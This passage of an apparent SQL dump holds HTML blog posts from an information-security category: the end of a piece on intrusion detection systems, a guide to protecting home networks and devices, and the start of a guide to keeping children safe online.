IDS to your arsenal, you position your business for success against the backdrop of increasing cyber threats.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Choosing the Right IDS for Your Needs</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Selecting the ideal IDS involves considering your organization’s specific requirements, such as the size of your network, compliance requirements, and your internal resource capabilities. Solutions like network-based IDS (NIDS) are perfect for monitoring entire infrastructures, while host-based IDS (HIDS) are tailored for finer, localized control.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">An <b><strong class=\"font-bold\">Intrusion Detection System (IDS)</strong></b> isn’t just a \"nice-to-have\" anymore—it’s a must-have for any business aiming to safeguard its critical systems. With its focus on detection rather than prevention, it serves as an early warning system, allowing organizations to act swiftly to counter threats.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">However, an IDS works best as part of a <b><strong class=\"font-bold\">layered security strategy</strong></b>, including tools like <b><strong class=\"font-bold\">Intrusion Prevention Systems (IPS)</strong></b> to block attacks, alongside firewalls and endpoint protection. It’s about building comprehensive, actionable defenses in an age where cyber threats are more prevalent than ever.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Is your network secure? Start exploring IDS solutions today to bring peace of mind to your business</p>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>', '', NULL, NULL, 1, 'draft', '2024-08-01 02:19:11', '2026-01-12 21:41:44', 'Information Security', 'The Fundamentals of Intrusion Detection Systems (IDS): How They Work and Why They\'re Essential', '', NULL),
(136, 'Protect your networks devices from cyber threats', 'protect-your-networks-devices-from-cyber-threats', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ensuring the security of your home devices and networks has become a top priority in today\'s hyper-connected world. With cyber threats evolving constantly, the need for robust, multi-layered cybersecurity strategies cannot be overstated. This guide dives deep into eight effective ways to secure your digital fortress, offering practical insights to protect your personal information and devices.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Set Up a Firewall</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A firewall acts as the first line of defense for your home network, monitoring and controlling both incoming and outgoing traffic. Think of it as a vigilant security guard standing at the gate of your digital world, protecting you from potential threats.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Benefits of a Firewall:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Blocks unauthorized access.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Shields devices from external threats.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Establishes a secure barrier between your trusted internal network and unknown, external networks.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Pro Tip:</strong></b> Make sure your firewall is enabled on your router and that any connected devices also have their firewalls activated.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Install Antivirus and Anti-Malware Software</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Antivirus and anti-malware software are like your digital immune system, working around the clock to detect and neutralize threats like viruses, ransomware, and spyware.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Always keep your software up-to-date to defend against the latest threats.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Schedule regular scans to catch any hidden vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Choose software from reputable providers to ensure your security is in expert hands.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Use a Virtual Private Network (VPN)</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A virtual private network (VPN) encrypts your internet connection, making it nearly impossible for hackers to intercept or steal your data. Think of a VPN as an invisibility cloak, protecting your online activity from prying eyes.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Advantages of a VPN:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Secures your internet connection through encryption.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Masks your IP address and location for added privacy.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Protects sensitive data when using public Wi-Fi networks, such as at cafes or airports.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Keep Software and Systems Updated</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Using outdated software and devices is akin to leaving your front door wide open for cybercriminals. Many attacks exploit vulnerabilities in older systems, so regular updates are crucial.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Update Checklist:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Operating systems on computers, smartphones, and tablets.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Software applications and programs.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Firmware for routers and other networked devices.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Security software for all devices.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Pro Tip:</strong></b> Enable automatic updates wherever possible to stay protected without lifting a finger.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Use Strong, Unique Passwords</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Your passwords are the keys to your digital kingdom. The stronger they are, the harder it is for hackers to gain access to your accounts and devices.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Password Best Practices:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Create a mix of uppercase and lowercase letters, numbers, and symbols.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Avoid using easily guessable information, like your name or birthdate.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Use a different password for each account to limit exposure.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Consider using a password manager to securely store and generate complex passwords.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. Enable Two-Factor Authentication (2FA)</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Two-factor authentication adds an extra layer of security to your accounts. It’s like having both a lock and an alarm system for your digital assets.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How It Works:</h3>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Enter your password to access your account.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Provide a second form of verification, such as a fingerprint, a one-time code sent to your phone, or an authentication app.</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Pro Tip:</strong></b> Wherever possible, enable 2FA on all accounts, including email, social media, and financial services.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. Exercise Caution with Emails and Links</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing emails and suspicious links remain some of the most common entry points for cybercriminals. A little caution can go a long way in keeping your devices safe.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Safety Tips:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Avoid clicking on links from unknown senders.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Be wary of unexpected attachments, even from people you know.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Verify sender email addresses for authenticity.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">When in doubt, contact the sender through a trusted method to confirm the email’s legitimacy.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">8. Educate Yourself About Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Knowledge is power when it comes to staying ahead of cyber threats. Understanding the latest cybersecurity trends and best practices can help you safeguard your digital life.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Ways to Stay Updated:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Follow cybersecurity blogs and subscribe to newsletters.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Attend webinars and online courses to deepen your knowledge.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Join forums and online communities to exchange tips and resources with like-minded individuals.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why a Multi-Layered Approach Matters</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is not a singular solution—it\'s a combination of defenses that work together to protect your home network and devices. A firewall keeps unauthorized access at bay, antivirus software catches malicious threats, and strong passwords and 2FA secure individual accounts. When these methods are combined, they create a digital environment that’s much harder for cybercriminals to penetrate.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Protecting your home devices doesn’t have to be overwhelming. By implementing these eight strategies, you’ll significantly reduce your chances of falling victim to cybercrime. Take proactive steps today to secure your digital world—it’s a small investment of time for long-term peace of mind.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For more tips, tutorials, and the latest trends in cybersecurity, subscribe to our newsletter and stay ahead of the game. Secure smarter, not harder!</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 02:17:33', '2026-01-12 21:41:44', 'Information Security', 'Protect your networks devices from cyber threats', '', NULL),
(137, 'Keep safe your kids from danger of internet', 'keep-safe-your-kids-from-danger-of-internet', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The internet is a double-edged sword. On one hand, it provides kids with access to a wealth of knowledge, opportunities for education, and platforms to connect with peers. On the other hand, it exposes them to risks that can jeopardize their safety and well-being. For parents, finding an effective way to protect children while allowing them to benefit from the digital world is a must.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">From inappropriate content to cyberbullying and online exploitation, the internet has its share of dangers. But the good news is, there are effective steps you can take to shield your kids from harm and equip them with the tools to safely explore the online world. Let\'s break it down.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Keeping Kids Safe Online Is Crucial</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Children today are born into a digital-first world, often spending hours online every day. While technology is an incredible tool for learning and entertainment, it also includes hidden threats. Here\'s why safeguarding their digital presence is critical:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Protecting Against Exposure to Harmful Content</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The internet is full of content that isn’t appropriate for young eyes, including violence, hate speech, and explicit material. Children who stumble upon such content may experience fear, confusion, or emotional discomfort. By being proactive, you can help ensure their online experiences are enriching instead of overwhelming.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Preventing Cyberbullying</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The anonymity of the internet unfortunately makes it a breeding ground for cyberbullying. Hurtful comments, social exclusion, and online harassment can have serious emotional and psychological impacts on kids. Monitoring their online interactions and fostering open communication can make a world of difference.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Protecting Personal Information</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Kids are often unaware of the consequences of oversharing personal information online. Identity theft, scams, or contact with harmful individuals become possibilities when privacy isn\'t maintained. Teaching your children about the value of safeguarding personal details will help keep them safe.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Reducing the Risk of Online Exploitation</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Predators often exploit the anonymity of online platforms. From seemingly harmless gaming chats to social media interactions, vulnerable children may unknowingly interact with individuals who do not have their best interests at heart. Monitoring their online activities can prevent these risks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Encouraging Healthy Screen Habits</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Excessive screen time has been linked to issues such as disrupted sleep patterns, difficulty concentrating, and reduced physical activity. By setting limits and encouraging offline activities, you can help your children develop a balanced, healthy lifestyle while enjoying the benefits of technology.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Proven Strategies for Keeping Kids Safe Online</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Protecting kids from the dangers of the internet doesn’t have to be overwhelming. Here are several practical and effective strategies that parents can adopt today:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. Use Parental Control Software</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Parental control software is your first line of defense. These tools allow you to track your child’s online activities, block inappropriate content, and set time limits on device usage. Many parental control apps even provide detailed reports about the apps, websites, and platforms your child is using.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Popular parental control tools to consider:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Qustodio</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Bark</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Net Nanny</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Norton Family</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. Regularly Check Their Devices</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Get in the habit of accessing your child’s devices, including smartphones, tablets, and laptops. Review their browsing history, installed apps, and digital downloads. While this step helps ensure transparency in their online behavior, remember to explain to your kids why regular checks are necessary.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Monitor Social Media Usage</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Social media platforms are a mixed bag for children. While they allow kids to stay connected with friends, they can also be places where oversharing, cyberbullying, or exposure to inappropriate posts occur.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Encourage your children to use privacy settings, limit personal details in their profiles, and avoid interacting with strangers online. It may also be helpful to keep an eye on whom they’re communicating with and the content they’re sharing.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Foster Open Communication</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One of the most effective ways to protect your kids online is to keep the lines of communication open. Reassure them that they can approach you without fear if something they see online makes them uncomfortable.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Start conversations by asking questions like:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">\"What’s your favorite part of being online?\"</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">\"Have you seen anything online that made you feel uncomfortable recently?\"</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">\"How do you think people can stay safe while using social media or games?\"</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This kind of dialogue helps to create trust and empowers children to share their questions and concerns.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. Set Limits for Screen Time</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Establish clear rules around how much time kids can spend online daily or weekly. Setting limits encourages them to take breaks, get outside for physical activities, and spend quality time with family.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Consider using features like Apple\'s \"Screen Time\" or Android\'s \"Digital Wellbeing\" to set restrictions automatically.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. Educate Yourself on Online Trends</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The more you understand the latest technologies, social media platforms, and online trends, the better equipped you\'ll be to guide and protect your kids. Follow trusted parenting blogs, listen to podcasts, or even join online forums where parents discuss digital safety.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Striking the Right Balance</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While it’s important to monitor your child’s internet activities, it’s equally essential to respect their privacy and foster independence. Carve out boundaries that balance their need for online exploration with safety precautions.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For example:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Instead of looking at their personal chats without consent, agree that you’ll only check in specific situations where safety is in question.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Allow them to select some of their entertainment options while discussing what makes content safe or appropriate.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Empowering kids to recognize potential online dangers and make their own decisions with your guidance is one of the most effective ways to raise responsible digital 